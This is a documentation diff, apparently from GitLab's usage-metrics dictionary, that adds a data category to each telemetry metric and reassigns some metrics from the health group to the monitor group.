`Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1482,6 +1722,8 @@ Count of active groups inheriting integrations for Campfire Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1494,6 +1736,8 @@ Count of active groups inheriting integrations for Confluence Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1506,6 +1750,8 @@ Count of active groups inheriting integrations for a Custom Issue Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1518,6 +1764,8 @@ Count of active groups inheriting integrations for Datadog Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1530,6 +1778,8 @@ Count of active groups inheriting integrations for Discord Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1542,6 +1792,8 @@ Count of active groups inheriting integrations for Drone CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1554,6 +1806,8 @@ Count of active groups inheriting integrations for Emails on Push Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1566,6 +1820,8 @@ Count of active groups inheriting integrations for EWM Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1578,6 +1834,8 @@ Count of active groups inheriting integrations for External Wiki Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1590,6 +1848,8 @@ Count of active groups inheriting integrations for Flowdock Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1602,6 +1862,8 @@ Count of active groups inheriting integrations for GitHub Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -1614,6 +1876,8 @@ Count of active groups inheriting integrations for Hangouts Chat Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1626,6 +1890,8 @@ Count of active groups inheriting integrations for HipChat Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -1638,6 +1904,8 @@ Count of active groups inheriting integrations for Irker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1650,6 +1918,8 @@ Count of active groups inheriting integrations for Jenkins Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1662,6 +1932,8 @@ Count of active groups inheriting integrations for Jira Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1674,6 +1946,8 @@ Count of active groups inheriting integrations for Mattermost Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1686,6 +1960,8 @@ Count of active groups inheriting integrations for Mattermost (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1698,6 +1974,8 @@ Count of active groups inheriting integrations for Microsoft Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1710,6 +1988,8 @@ Count of active groups inheriting integrations for Mock CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -1722,6 +2002,8 @@ Count of active groups inheriting integrations for Mock Monitoring Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -1734,6 +2016,8 @@ Count of active groups inheriting integrations for Packagist Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1746,6 +2030,8 @@ Count of active groups inheriting integrations for Pipeline Emails Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1758,6 +2044,8 @@ Count of active groups inheriting integrations for Pivotal Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1770,6 +2058,8 @@ Count of active groups inheriting integrations for Prometheus Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1782,6 +2072,8 @@ Count of active groups inheriting integrations for Pushover Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1794,6 +2086,8 @@ Count of active groups inheriting integrations for Redmine Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1806,6 +2100,8 @@ Count of active groups inheriting integrations for Slack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1818,6 +2114,8 @@ Count of active groups inheriting integrations for Slack (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1830,6 +2128,8 @@ Count of active groups inheriting integrations for Teamcity CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1842,6 +2142,8 @@ Count of active groups inheriting integrations for Unifiy Circuit Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1854,6 +2156,8 @@ Count of active groups inheriting integrations for Webex Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1866,6 +2170,8 @@ Count of active groups inheriting integrations for YouTrack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1878,6 +2184,8 @@ Count of groups with active integrations for Irker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1890,6 +2198,8 @@ Count of groups with active integrations for Jenkins Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1902,6 +2212,8 @@ Count of groups with active integrations for Jira Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1914,6 +2226,8 @@ Count of groups with active integrations for Mattermost Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1926,6 +2240,8 @@ Count of groups with active integrations for Mattermost (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1938,6 +2254,8 @@ Count of groups with active integrations for Microsoft Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1950,6 +2268,8 @@ Count of groups with active integrations for Mock CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -1962,6 +2282,8 @@ Count of groups with active integrations for Mock Monitoring Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -1974,6 +2296,8 @@ Count of groups with active integrations for Packagist Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1986,6 +2310,8 @@ Count of groups with active integrations for Pipeline Emails Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -1998,6 +2324,8 @@ Count of groups with active integrations for Pivotal Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2010,6 +2338,8 @@ Count of groups with active integrations for Prometheus Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2022,6 +2352,8 @@ Count of groups with active integrations for Pushover Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2034,6 +2366,8 @@ Count of groups with active integrations for Redmine Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2046,6 +2380,8 @@ Count of groups with active integrations for Slack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2058,6 +2394,8 @@ Count of groups with active integrations for Slack (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2070,6 +2408,8 @@ Count of groups with active integrations for Teamcity CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2082,6 +2422,8 @@ Count of groups with active integrations for Unifiy Circuit Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2094,6 +2436,8 @@ Count of groups with active integrations for Webex Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2106,6 +2450,8 @@ Count of groups with active integrations for YouTrack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2118,6 +2464,8 @@ Total clicks on the create track's first email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2130,6 +2478,8 @@ Total sent emails of the create track's first email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2142,6 +2492,8 @@ Total clicks on the create track's second email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2154,6 +2506,8 @@ Total sent emails of the create track's second email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2166,6 +2520,8 @@ Total clicks on the create track's third email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2178,6 +2534,8 @@ Total sent emails of the create track's third email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2190,6 +2548,8 @@ Total sent emails of the experience track's first email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2202,6 +2562,8 @@ Total clicks on the team track's first email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2214,6 +2576,8 @@ Total sent emails of the team track's first email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2226,6 +2590,8 @@ Total clicks on the team track's second email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2238,6 +2604,8 @@ Total sent emails of the team track's second email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2250,6 +2618,8 @@ Total clicks on the team track's third email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2262,6 +2632,8 @@ Total sent emails of the team track's third email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2274,6 +2646,8 @@ Total clicks on the verify trial's first email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2286,6 +2660,8 @@ Total sent emails of the trial track's first email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2298,6 +2674,8 @@ Total clicks on the trial track's second email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2310,6 +2688,8 @@ Total sent emails of the trial track's second email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2322,6 +2702,8 @@ Total clicks on the trial track's third email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2334,6 +2716,8 @@ Total sent emails of the trial track's third email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2346,6 +2730,8 @@ Total clicks on the verify track's first email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2358,6 +2744,8 @@ Total sent emails of the verify track's first email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2370,6 +2758,8 @@ Total clicks on the verify track's second email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2382,6 +2772,8 @@ Total sent emails of the verify track's second email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2394,6 +2786,8 @@ Total clicks on the verify track's third email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2406,6 +2800,8 @@ Total sent emails of the verify track's third email Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2418,6 +2814,8 @@ Missing description Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -2428,7 +2826,9 @@ Count of incidents (issues where issue_type=incident) [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180447_incident_issues.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` @@ -2440,7 +2840,9 @@ Count of all issues with the label=incident [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180451_incident_labeled_issues.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` @@ -2454,6 +2856,8 @@ Whether or not ModSecurity is set to blocking mode Group: `group::container security` +Data Category: `Operational` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -2466,6 +2870,8 @@ Whether or not ModSecurity is disabled within Ingress Group: `group::container security` +Data Category: `Operational` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -2478,6 +2884,8 @@ Whether or not ModSecurity is set to logging mode Group: `group::container security` +Data Category: `Operational` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -2490,6 +2898,8 @@ Whether or not ModSecurity has not been installed into the cluster Group: `group::container security` +Data Category: `Operational` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -2502,6 +2912,8 @@ Cumulative count of packets identified as anomalous by ModSecurity since Usage P Group: `group::container security` +Data Category: `Operational` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -2514,6 +2926,8 @@ Cumulative count of packets processed by ModSecurity since Usage Ping was last r Group: `group::container security` +Data Category: `Operational` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -2526,6 +2940,8 @@ Whether or not ModSecurity statistics are unavailable Group: `group::container security` +Data Category: `Operational` + Status: `removed` Tiers: `ultimate` @@ -2538,6 +2954,8 @@ Total GitLab Managed disabled clusters previously attached to the instance Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2550,6 +2968,8 @@ Total GitLab Managed clusters attached to the instance Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2562,6 +2982,8 @@ Count of active instance-level integrations for Asana Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2574,6 +2996,8 @@ Count of active instance-level integrations for Assembla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2586,6 +3010,8 @@ Count of active instance-level integrations for Bamboo CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2598,6 +3024,8 @@ Count of active instance-level integrations for Bugzilla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2610,6 +3038,8 @@ Count of active instance-level integrations for Buildkite Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2622,6 +3052,8 @@ Count of active instance-level integrations for Campfire Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2634,6 +3066,8 @@ Count of active instance-level integrations for Confluence Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2646,6 +3080,8 @@ Count of active instance-level integrations for a Custom Issue Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2658,6 +3094,8 @@ Count of active instance-level integrations for Datadog Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2670,6 +3108,8 @@ Count of active instance-level integrations for Discord Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2682,6 +3122,8 @@ Count of active instance-level integrations for Drone CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2694,6 +3136,8 @@ Count of active instance-level integrations for Emails on Push Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2706,6 +3150,8 @@ Count of active instance-level integrations for EWM Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2718,6 +3164,8 @@ Count of active instance-level integrations for External Wiki Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2730,6 +3178,8 @@ Count of active instance-level integrations for Flowdock Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2742,6 +3192,8 @@ Count of active instance-level integrations for GitHub Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -2754,6 +3206,8 @@ Count of active instance-level integrations for Hangouts Chat Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2766,6 +3220,8 @@ Count of active instance-level integrations for HipChat Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -2778,6 +3234,8 @@ Count of active instance-level integrations for Irker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2790,6 +3248,8 @@ Count of active instance-level integrations for Jenkins Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2802,6 +3262,8 @@ Count of active instance-level integrations for Jira Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2814,6 +3276,8 @@ Count of active instance-level integrations for Mattermost Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2826,6 +3290,8 @@ Count of active instance-level integrations for Mattermost (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2838,6 +3304,8 @@ Count of active instance-level integrations for Microsoft Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2850,6 +3318,8 @@ Count of active instance-level integrations for Mock CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -2862,6 +3332,8 @@ Count of active instance-level integrations for Mock Monitoring Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -2874,6 +3346,8 @@ Count of active instance-level integrations for Packagist Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2886,6 +3360,8 @@ Count of active instance-level integrations for Pipeline Emails Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2898,6 +3374,8 @@ Count of active instance-level integrations for Pivotal Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2910,6 +3388,8 @@ Count of active instance-level integrations for Prometheus Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2922,6 +3402,8 @@ Count of active instance-level integrations for Pushover Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2934,6 +3416,8 @@ Count of active instance-level integrations for Redmine Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2946,6 +3430,8 @@ Count of active instance-level integrations for Slack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2958,6 +3444,8 @@ Count of active instance-level integrations for Slack (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2970,6 +3458,8 @@ Count of active instance-level integrations for Teamcity CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2982,6 +3472,8 @@ Count of active instance-level integrations for Unifiy Circuit Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -2994,6 +3486,8 @@ Count of active instance-level integrations for Webex Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3006,6 +3500,8 @@ Count of active instance-level integrations for YouTrack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3018,6 +3514,8 @@ Count of Issues created Group: `group::plan` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3028,7 +3526,9 @@ Count of issues created automatically on alerts from GitLab-Managed Prometheus [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180441_issues_created_from_alerts.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` @@ -3040,11 +3540,13 @@ Count of issues manually created from the GitLab UI on Sentry errors [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180434_issues_created_from_gitlab_error_tracking_ui.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `counts.issues_created_gitlab_alerts` @@ -3052,7 +3554,9 @@ Count of all issues created from GitLab alerts (bot and non-bot) [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180443_issues_created_gitlab_alerts.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` @@ -3064,7 +3568,9 @@ Count of issues created manually by non-bot users from GitLab alerts [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180445_issues_created_manually_from_alerts.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` @@ -3076,7 +3582,9 @@ Count of issues where a user have added AND removed a zoom meeting using slash c [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180438_issues_using_zoom_quick_actions.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` @@ -3088,7 +3596,9 @@ Count of issues where a user has linked a Zoom meeting [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180436_issues_with_associated_zoom_link.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` @@ -3100,7 +3610,9 @@ Count of issues where a user has embedded a Grafana chart [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180440_issues_with_embedded_grafana_charts_approx.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` @@ -3114,6 +3626,8 @@ Count of issues with health status Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -3126,6 +3640,8 @@ Count of Projects that imported Issues from Jira Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3138,6 +3654,8 @@ Count of Jira imports completed Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3150,6 +3668,8 @@ Count of total issues imported via the Jira Importer Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3162,6 +3682,8 @@ Number of keys. Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3174,6 +3696,8 @@ Count of events when an Agent is asked to synchronize the manifests or its confi Group: `group::configure` +Data Category: `Operational` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -3186,6 +3710,8 @@ Count of Kubernetes API proxy requests Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -3198,6 +3724,8 @@ Count of Kubernetes registered agents Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -3210,6 +3738,8 @@ Count of Kubernetes agents with at least one token Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -3222,6 +3752,8 @@ Count of label lists created on Boards Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3234,6 +3766,8 @@ Count of Labels Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3246,6 +3780,8 @@ Number of groups that are synced via LDAP group sync `https://docs.gitlab.com/ee Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -3258,6 +3794,8 @@ Number of keys synced as part of LDAP `https://docs.gitlab.com/ee/administration Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -3270,6 +3808,8 @@ Number of users that are linked to LDAP Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -3282,6 +3822,8 @@ Missing description Group: `group::create` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -3294,6 +3836,8 @@ Count of License Scanning jobs run Group: `group::composition analysis` +Data Category: `Subscription` + Status: `data_available` Tiers: `ultimate` @@ -3306,6 +3850,8 @@ Count to License List page views Group: `group::composition analysis` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -3318,6 +3864,8 @@ Count of the number of merge request comments Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3330,6 +3878,8 @@ Count of the number of merge requests created Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3342,6 +3892,8 @@ Count of the number of merge requests Group: `group::code review` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3354,6 +3906,8 @@ Count of merge requests merged using approval rules Group: `group::compliance` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -3366,6 +3920,8 @@ Count of milestone lists created on Boards Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -3378,6 +3934,8 @@ Count of milestones created Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3390,6 +3948,8 @@ Total Searches using the navbar for All Basic Search and Advanced Search in self Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3402,6 +3962,8 @@ Cumulative count of packets dropped by Cilium (Container Network Security) since Group: `group::container security` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3414,6 +3976,8 @@ Cumulative count of packets forwarded by Cilium (Container Network Security) sin Group: `group::container security` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3426,6 +3990,8 @@ Count of Notes across all objects that use them Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3438,6 +4004,8 @@ Active users with enabled operations dashboard Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3450,6 +4018,8 @@ Active users with projects on operations dashboard Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3462,6 +4032,8 @@ A count of Composer packages that have been deleted Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3474,6 +4046,8 @@ A count of Composer packages that have been downloaded Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3486,6 +4060,8 @@ A count of Composer packages that have been published Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3498,6 +4074,8 @@ A count of Conan packages that have been deleted Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3510,6 +4088,8 @@ A count of Conan packages that have been downloaded Group: `group::package` 